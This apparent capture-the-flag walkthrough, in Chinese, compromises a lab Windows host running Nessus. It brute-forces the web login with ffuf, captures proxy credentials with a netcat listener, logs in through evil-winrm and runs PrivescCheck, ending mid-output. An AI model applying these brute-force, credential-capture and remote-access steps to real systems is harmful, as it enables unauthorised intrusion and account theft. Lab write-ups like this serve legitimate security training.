File Modification Date/Time     : 2025:06:09 03:48:22-04:00
File Access Date/Time           : 2025:06:09 03:48:22-04:00
File Inode Change Date/Time     : 2025:06:09 03:48:22-04:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
Linearized                      : No
Page Count                      : 5
Profile CMM Type                : Little CMS
Profile Version                 : 2.3.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 2004:08:13 12:18:06
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : Little CMS
Device Model                    : 
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Little CMS
Profile ID                      : 7fb30d688bf82d32a0e748daf3dba95d
Device Mfg Desc                 : lcms generated
Profile Description             : sRGB
Device Model Desc               : sRGB
Media White Point               : 0.95015 1 1.08826
Red Matrix Column               : 0.43585 0.22238 0.01392
Blue Matrix Column              : 0.14302 0.06059 0.71384
Green Matrix Column             : 0.38533 0.71704 0.09714
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Chromaticity Channels           : 3
Chromaticity Colorant           : Unknown
Chromaticity Channel 1          : 0.64 0.33
Chromaticity Channel 2          : 0.3 0.60001
Chromaticity Channel 3          : 0.14999 0.06
Profile Copyright               : no copyright, use freely
XMP Toolkit                     : Image::ExifTool 12.76
Date                            : 2024:10:18 15:10:05+02:00
Format                          : application/pdf
Language                        : x-unknown
Author                          : Jose
PDF Version                     : 1.4
Producer                        : Apache FOP Version 2.8
Create Date                     : 2024:10:18 15:10:05+02:00
Creator Tool                    : Apache FOP Version 2.8
Metadata Date                   : 2024:10:18 15:10:05+02:00
Page Mode                       : UseOutlines
Creator                         : Apache FOP Version 2.8
======== Web Application Tests_f6jg9t.pdf
ExifTool Version Number         : 13.10
File Name                       : Web Application Tests_f6jg9t.pdf
Directory                       : .
File Size                       : 136 kB
File Modification Date/Time     : 2025:06:09 03:48:22-04:00
File Access Date/Time           : 2025:06:09 03:48:23-04:00
File Inode Change Date/Time     : 2025:06:09 03:48:22-04:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
Linearized                      : No
Page Count                      : 6
Profile CMM Type                : Little CMS
Profile Version                 : 2.3.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 2004:08:13 12:18:06
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : Little CMS
Device Model                    : 
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Little CMS
Profile ID                      : 7fb30d688bf82d32a0e748daf3dba95d
Device Mfg Desc                 : lcms generated
Profile Description             : sRGB
Device Model Desc               : sRGB
Media White Point               : 0.95015 1 1.08826
Red Matrix Column               : 0.43585 0.22238 0.01392
Blue Matrix Column              : 0.14302 0.06059 0.71384
Green Matrix Column             : 0.38533 0.71704 0.09714
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Chromaticity Channels           : 3
Chromaticity Colorant           : Unknown
Chromaticity Channel 1          : 0.64 0.33
Chromaticity Channel 2          : 0.3 0.60001
Chromaticity Channel 3          : 0.14999 0.06
Profile Copyright               : no copyright, use freely
XMP Toolkit                     : Image::ExifTool 12.76
Date                            : 2024:10:18 15:10:19+02:00
Format                          : application/pdf
Language                        : x-unknown
Author                          : Jose
PDF Version                     : 1.4
Producer                        : Apache FOP Version 2.8
Create Date                     : 2024:10:18 15:10:19+02:00
Creator Tool                    : Apache FOP Version 2.8
Metadata Date                   : 2024:10:18 15:10:19+02:00
Page Mode                       : UseOutlines
Creator                         : Apache FOP Version 2.8
    3 image files read

爆破登录信息

发现了作者信息为Jose，尝试抓包爆破那个登录界面：

得到密码：tequiero。也可以使用别的办法比如ffuf

这我尝试过hydra一直报错我真没招了

┌──(kali㉿kali)-[~/temp/Nessus]
└─$ ffuf -u 'https://192.168.10.100:8834/session' -w /usr/share/wordlists/rockyou.txt -d '{"username":"jose","password":"FUZZ"}' -H 'Content-Type: application/json' -fc 401

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : https://192.168.10.100:8834/session
 :: Wordlist         : FUZZ: /usr/share/wordlists/rockyou.txt
 :: Header           : Content-Type: application/json
 :: Data             : {"username":"jose","password":"FUZZ"}
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 401
________________________________________________

tequiero                [Status: 200, Size: 179, Words: 1, Lines: 1, Duration: 1796ms]

登录获取认证信息

网上搜了下没找到反弹shell方法

将攻击机ip端口添加上去nc进行监听

┌──(web)─(root㉿kali)-[/home/kali]
└─# nc -lvvp 4444
listening on [any] 4444 ...
192.168.0.107: inverse host lookup failed: Unknown host
connect to [192.168.0.108] from (UNKNOWN) [192.168.0.107] 49758

EHLO Nessus

RSET

MAIL FROM: <>

QUIT

 sent 5, rcvd 40 : Connection reset by peer

没啥东西，换一个

┌──(web)─(root㉿kali)-[/home/kali]
└─# nc -lvvp 4444
listening on [any] 4444 ...
192.168.0.107: inverse host lookup failed: Unknown host
connect to [192.168.0.108] from (UNKNOWN) [192.168.0.107] 49784
CONNECT plugins.nessus.org:443 HTTP/1.1
Host: plugins.nessus.org
Connection: keep-Alive
User-Agent: Nessus/10.7.3
Content-Length: 0
Proxy-Connection: Keep-Alive

没啥东西切换一下Auth Method

换到basic时出现编码

┌──(web)─(root㉿kali)-[/home/kali]
└─# nc -lvvp 4444
listening on [any] 4444 ...
192.168.0.107: inverse host lookup failed: Unknown host
connect to [192.168.0.108] from (UNKNOWN) [192.168.0.107] 49809
CONNECT plugins.nessus.org:443 HTTP/1.1
Proxy-Authorization: Basic bmVzdXM6WiNKdVhIJHBoLTt2QCxYJm1WKQ==
Host: plugins.nessus.org
Connection: keep-Alive
User-Agent: Nessus/10.7.3
Content-Length: 0
Proxy-Connection: Keep-Alive

┌──(kali㉿kali)-[~]
└─$ echo 'bmVzdXM6WiNKdVhIJHBoLTt2QCxYJm1WKQ==' |base64 -d   
nesus:Z#JuXH$ph-;v@,X&mV)

二次信息收集

enum4linux

尝试了下没成功

crackmapexec

┌──(web)─(root㉿kali)-[/home/kali]
└─# crackmapexec smb 192.168.0.107 --groups --loggedon-users -u nesus -p 'Z#JuXH$ph-;v@,X&mV)'
SMB         192.168.0.107   445    NESSUS           [*] Windows Server 2022 Build 20348 x64 (name:NESSUS) (domain:Nessus) (signing:False) (SMBv1:False)
SMB         192.168.0.107   445    NESSUS           [-] Nessus\nesus:Z#JuXH$ph-;v@,X&mV) STATUS_PASSWORD_EXPIRED

STATUS_PASSWORD_EXPIRED

靶机密码过期

windows靶机的常见bug，认证过期了，尝试重置密码进行更新靶机：

ctrl+alt+del(virtualbox 里面是右键ctrl+del)解锁，然后按esc返回上一级：

点击nesus，然后输入密码以后：

enter一下，换完密码以后：

这里再enter一下，我修改的是password

evil-winrm连接

┌──(web)─(root㉿kali)-[/home/kali]
└─# evil-winrm -i 192.168.0.107 -u 'nesus' -p 'password'

                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                              
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                         
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nesus\Documents>

提权

上传msf木马被杀了

上传winPEAS被杀了，上传winPEAS.bat倒是成功

不过，没找到什么提权点

用到了这个脚本：https://github.com/itm4n/PrivescCheck

*Evil-WinRM* PS C:\Users\nesus\Documents> .\PrivescCheck.ps1
*Evil-WinRM* PS C:\Users\nesus\Documents> Invoke-PrivescCheck
The term 'Invoke-PrivescCheck' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Invoke-PrivescCheck
+ ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-PrivescCheck:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

👉 只会“跑一遍脚本文件”
👉 不会把里面定义的函数注册到当前 PowerShell 会话

所以后面：

Invoke-PrivescCheck

必然报：

CommandNotFoundException

✅ 正确姿势（就差这一步）

✅ 方法 1（最推荐）：点源（dot sourcing）

⚠️ 注意：前面有一个点 + 空格

. .\PrivescCheck.ps1

然后再执行：

Invoke-PrivescCheck

✔ 这一步才是“把函数加载进当前会话”

✅ 方法 2：Import-Module（也行）

Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck

*Evil-WinRM* PS C:\Users\nesus\Documents> .\PrivescCheck.ps1
*Evil-WinRM* PS C:\Users\nesus\Documents> Invoke-PrivescCheck
The term 'Invoke-PrivescCheck' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Invoke-PrivescCheck
+ ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-PrivescCheck:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\nesus\Documents> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0043 - Reconnaissance                           ?
? NAME     ? User - Identity                                   ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Get information about the current user (name, domain name)   ?
? and its access token (SID, integrity level, authentication   ?
? ID).                                                         ?
????????????????????????????????????????????????????????????????


Name             : NESSUS\nesus
SID              : S-1-5-21-2986980474-46765180-2505414164-1001
IntegrityLevel   : Medium Mandatory Level (S-1-16-8192)
SessionId        : 0
TokenId          : 00000000-000a8454
AuthenticationId : 00000000-00091fba
OriginId         : 00000000-00000000
ModifiedId       : 00000000-00091fd8
Source           : NtLmSsp (00000000-00000000)



[*] Status: Informational - Severity: None - Execution time: 00:00:00.190


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0043 - Reconnaissance                           ?
? NAME     ? User - Groups                                     ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Get information about the groups the current user belongs to ?
? (name, type, SID).                                           ?
????????????????????????????????????????????????????????????????

Name                                   Type           SID
----                                   ----           ---
NESSUS\None                            Group          S-1-5-21-2986980474-46765180-2505414164-513
Everyone                               WellKnownGroup S-1-1-0
BUILTIN\Remote Management Users        Alias          S-1-5-32-580
BUILTIN\Users                          Alias          S-1-5-32-545
NT AUTHORITY\NETWORK                   WellKnownGroup S-1-5-2
NT AUTHORITY\Authenticated Users       WellKnownGroup S-1-5-11
NT AUTHORITY\This Organization         WellKnownGroup S-1-5-15
NT AUTHORITY\Local account             WellKnownGroup S-1-5-113
NT AUTHORITY\NTLM Authentication       WellKnownGroup S-1-5-64-10
Mandatory Label\Medium Mandatory Level Label          S-1-16-8192


[*] Status: Informational - Severity: None - Execution time: 00:00:00.101


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? User - Privileges                                 ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the current user is granted privileges that    ?
? can be leveraged for local privilege escalation.             ?
????????????????????????????????????????????????????????????????

Name                          State   Description                    Exploitable
----                          -----   -----------                    -----------
SeChangeNotifyPrivilege       Enabled Bypass traverse checking             False
SeIncreaseWorkingSetPrivilege Enabled Increase a process working set       False


[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.068


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? User - Privileges (GPO)                           ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the current user is granted privileges,        ?
? through a group policy, that can be leveraged for local      ?
? privilege escalation.                                        ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.114


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access                        ?
? NAME     ? User - Environment Variables                      ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether any environment variables contain sensitive    ?
? information such as credentials or secrets. Note that this   ?
? check follows a keyword-based approach and thus might not be ?
? completely reliable.                                         ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (nothing found) - Severity: None - Execution time: 00:00:00.046


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Services - Non-Default Services                   ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Get information about third-party services. It does so by    ?
? parsing the target executable's metadata and checking        ?
? whether the publisher is Microsoft.                          ?
????????????????????????????????????????????????????????????????


Name        : fsMT
DisplayName : fsMT
ImagePath   : C:\Windows\gAwFavaS.exe
User        : LocalSystem
StartMode   : Manual

Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled

Name        : Tenable Nessus
DisplayName : Tenable Nessus
ImagePath   : "C:\Program Files\Tenable\Nessus\nessus-service.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : tldJ
DisplayName : tldJ
ImagePath   : C:\Windows\iAkZGZHW.exe
User        : LocalSystem
StartMode   : Manual



[*] Status: Informational - Severity: None - Execution time: 00:00:01.121


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Services - Known Vulnerable Kernel Drivers        ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether known vulnerable kernel drivers are installed. ?
? It does so by computing the file hash of each driver and     ?
? comparing the value against the list provided by             ?
? loldrivers.io.                                               ?
????????????????????????????????????????????????????????????????
WARNING: Service: RasGre | Path not found: C:\Windows\System32\drivers\rasgre.sys
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:16.700


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Services - Permissions                            ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the current user has any write permissions on  ?
? a service through the Service Control Manager (SCM).         ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:05.880


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Services - Registry Permissions                   ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the current user has any write permissions on  ?
? the configuration of a service in the registry.              ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:01.299


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Services - Image File Permissions                 ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the current user has any write permissions on  ?
? a service's binary or its folder.                            ?
????????????????????????????????????????????????????????????????
WARNING: QueryServiceStatusEx - The handle is invalid (6)


Name              : Tenable Nessus
DisplayName       : Tenable Nessus
User              : LocalSystem
ImagePath         : "C:\Program Files\Tenable\Nessus\nessus-service.exe"
StartMode         : Automatic
Type              : Win32OwnProcess
RegistryKey       : HKLM\SYSTEM\CurrentControlSet\Services
RegistryPath      : HKLM\SYSTEM\CurrentControlSet\Services\Tenable Nessus
Status            :
UserCanStart      : False
UserCanStop       : False
ModifiablePath    : C:\Program Files\Tenable\Nessus\nessus-service.exe
IdentityReference : NESSUS\nesus (S-1-5-21-2986980474-46765180-2505414164-1001)
Permissions       : AllAccess



[*] Status: Vulnerable - Severity: High - Execution time: 00:00:05.979


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Services - Unquoted Paths                         ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether there are services configured with an          ?
? exploitable unquoted path that contains spaces.              ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.082


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Services - Service Control Manager Permissions    ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the current user has any write permissions on  ?
? the Service Control Manager (SCM).                           ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.036


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Scheduled Tasks - Image File Permissions          ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the current user has any write permissions on  ?
? a scheduled task's binary or its folder. Note that           ?
? low-privileged users cannot list all the scheduled tasks.    ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:01.279


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access                        ?
? NAME     ? Credentials - Hive File Permissions               ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the current user has read permissions on the   ?
? SAM/SYSTEM/SECURITY hive files, either in the system folder  ?
? or in volume shadow copies (CVE-2021-36934 - HiveNightmare). ?
????????????????????????????????????????????????????????????????
WARNING: NtOpenSymbolicLinkObject('\Device\BootDevice') - Access is denied (5)
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.213


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access                        ?
? NAME     ? Credentials - Unattend Files                      ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether there are any 'unattend' files and whether     ?
? they contain clear-text credentials.                         ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.023


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access                        ?
? NAME     ? Credentials - WinLogon                            ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the 'WinLogon' registry key contains           ?
? clear-text credentials. Note that entries with an empty      ?
? password field are filtered out.                             ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.026


WARNING: Check 'Credentials - Vault (creds)' is categorized as risky, but the option '-Risky' was
not specified, ignoring...
WARNING: Check 'Credentials - Vault (list)' is categorized as risky, but the option '-Risky' was
not specified, ignoring...
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access                        ?
? NAME     ? Credentials - Group Policy Preferences (GPP)      ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether there are cached Group Policy Preference (GPP) ?
? files that contain clear-text passwords.                     ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.040


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access                        ?
? NAME     ? Credentials - SCCM Network Access Account (NAA)   ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether SCCM NAA credentials are stored in the WMI     ?
? repository. If so, the username and password DPAPI blobs are ?
? returned, but can only be decrypted using the SYSTEM's DPAPI ?
? user key.                                                    ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.220


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access                        ?
? NAME     ? Credentials - SCCM Cache Folder                   ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the SCCM cache folders contain files with      ?
? potentially hard coded credentials, or secrets, using basic  ?
? keywords such as 'password', or 'secret'.                    ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.024


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access                        ?
? NAME     ? Credentials - Symantec Account Connectivity       ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether a Symantec Management Agent (SMA) is installed ?
? and whether Account Connectivity Credentials (ACCs) are      ?
? stored locally.                                              ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.024


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access                        ?
? NAME     ? Credentials - SCOM Run As Account                 ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the event logs contain traces of SCOM Run As   ?
? accounts being used locally. If so, the clear-text           ?
? credentials of those accounts can be extracted from the      ?
? registry with administrator privileges.                      ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.029


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access                        ?
? NAME     ? Hardening - LSA Protection                        ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether LSA protection is enabled. Note that when LSA  ?
? protection is enabled, 'lsass.exe' runs as a Protected       ?
? Process Light (PPL) and thus can only be accessed by other   ?
? protected processes with an equivalent or higher protection  ?
? level.                                                       ?
????????????????????????????????????????????????????????????????


Key         : HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Value       : RunAsPPL
Data        : (null)
Description : LSA Protection is not enabled.



[*] Status: Vulnerable - Severity: Low - Execution time: 00:00:00.034


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access                        ?
? NAME     ? Hardening - Credential Guard                      ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether Credential Guard is supported and enabled.     ?
? Note that when Credential Guard is enabled, credentials are  ?
? stored in an isolated process ('LsaIso.exe') that cannot be  ?
? accessed, even if the kernel is compromised.                 ?
????????????????????????????????????????????????????????????????


LsaCfgFlagsPolicyKey       : HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard
LsaCfgFlagsPolicyValue     : LsaCfgFlags
LsaCfgFlagsPolicyData      : (null)
LsaCfgFlagsKey             : HKLM\SYSTEM\CurrentControlSet\Control\LSA
LsaCfgFlagsValue           : LsaCfgFlags
LsaCfgFlagsData            : (null)
LsaCfgFlagsDescription     : Credential Guard is not configured.
CredentialGuardConfigured  : False
CredentialGuardRunning     : False
CredentialGuardDescription : Credential Guard is not configured. Credential Guard is not running.



[*] Status: Vulnerable - Severity: Low - Execution time: 00:00:05.477


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0008 - Lateral Movement                         ?
? NAME     ? Hardening - LAPS                                  ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether LAPS is configured and enabled. Note that this ?
? applies to domain-joined machines only.                      ?
????????????????????????????????????????????????????????????????


Description : The machine is not domain-joined, this check is irrelevant.



[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.075


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0001 - Initial Access                           ?
? NAME     ? Hardening - BitLocker                             ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether BitLocker is enabled on the system drive and   ?
? requires a second factor of authentication (PIN or startup   ?
? key). Note that this check might yield a false positive if a ?
? third-party drive encryption software is installed.          ?
????????????????????????????????????????????????????????????????
WARNING: No TPM device found.


MachineRole : Server
TpmPresent  : False
Description : Not a workstation, BitLocker configuration is irrelevant.



[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.077


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Configuration - PATH Folder Permissions           ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the current user has any write permissions on  ?
? the system-wide PATH folders. If so, the system could be     ?
? vulnerable to privilege escalation through ghost DLL         ?
? hijacking.                                                   ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.142


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Misc - Known Ghost DLLs                           ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Get information about services that are known to be prone to ?
? ghost DLL hijacking. Note that their exploitation requires   ?
? the current user to have write permissions on at least one   ?
? system-wide PATH folder.                                     ?
????????????????????????????????????????????????????????????????


Name           : WptsExtensions.dll
Description    : Loaded by the Task Scheduler service (Schedule) upon startup.
RunAs          : LocalSystem
RebootRequired : True
Link           : http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservic
                 e.html



[*] Status: Informational - Severity: None - Execution time: 00:00:00.066


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Configuration - NTLM Downgrade (NTLMv1)           ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the machine is vulnerable to NTLM downgrade    ?
? attacks. If so, a local or remote attacker could capture the ?
? NTLMv1 authentication of the computer account (or another    ?
? authenticated user), and recover its NT hash offline.        ?
????????????????????????????????????????????????????????????????


NtlmMinServerSec                        : 536870912
NtlmMinServerSecDescription             : Require 128-bit encryption
BlockNtlmv1SSO                          : 0
BlockNtlmv1SSODescription               : The request to generate NTLMv1-credentials for a
                                          logged-on user is audited but allowed to succeed.
                                          Warning events are generated. This setting is also
                                          called Audit mode.
NtlmMinClientSec                        : 536870912
NtlmMinClientSecDescription             : Require 128-bit encryption
RestrictSendingNTLMTraffic              : 0
RestrictSendingNTLMTrafficDescription   : Allow all
RestrictReceivingNTLMTraffic            : 0
RestrictReceivingNTLMTrafficDescription : Allow all
LmCompatibilityLevel                    : 3
LmCompatibilityLevelDescription         : Send NTLMv2 response only
CredentialGuard                         : Credential Guard is not configured. Credential Guard is
                                          not running.



[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:05.066


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Configuration - MSI AlwaysInstallElevated         ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the 'AlwaysInstallElevated' policy is enabled  ?
? system-wide and for the current user. If so, the current     ?
? user may install a Windows Installer package with elevated   ?
? (SYSTEM) privileges.                                         ?
????????????????????????????????????????????????????????????????


LocalMachineKey   : HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
LocalMachineValue : AlwaysInstallElevated
LocalMachineData  : (null)
Description       : AlwaysInstallElevated is not enabled in HKLM.



[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.024


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0008 - Lateral Movement                         ?
? NAME     ? Configuration - WSUS                              ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether WSUS uses the HTTPS protocol to retrieve       ?
? updates from the on-premise update server. If WSUS uses the  ?
? clear-text HTTP protocol, it is vulnerable to MitM attacks   ?
? that may result in remote code execution as SYSTEM.          ?
????????????????????????????????????????????????????????????????


Key         : HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
Value       : WUServer
Data        : (null)
Description : No WSUS server is configured (default).

Key         : HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
Value       : UseWUServer
Data        : (null)
Description : WSUS server not enabled (default).

Key         : HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
Value       : SetProxyBehaviorForUpdateDetection
Data        : (null)
Description : Proxy fallback not configured (default).

Key         : HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
Value       : DisableWindowsUpdateAccess
Data        : (null)
Description : Windows Update features are enabled (default).



[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.027


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0008 - Lateral Movement                         ?
? NAME     ? Configuration - Hardened UNC Paths                ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether sensitive UNC paths are properly hardened.     ?
? Note that non-hardened UNC paths used for retrieving group   ?
? policies can be hijacked through an MitM attack to obtain    ?
? remote code execution as SYSTEM.                             ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.035


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Configuration - Point and Print                   ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the Print Spooler service is enabled and if    ?
? the Point and Print configuration allows non-administrator   ?
? users to install printer drivers.                            ?
????????????????????????????????????????????????????????????????


Description : The Print Spooler service is disabled.



[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.039


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Configuration - Application Repair Whitelist      ?
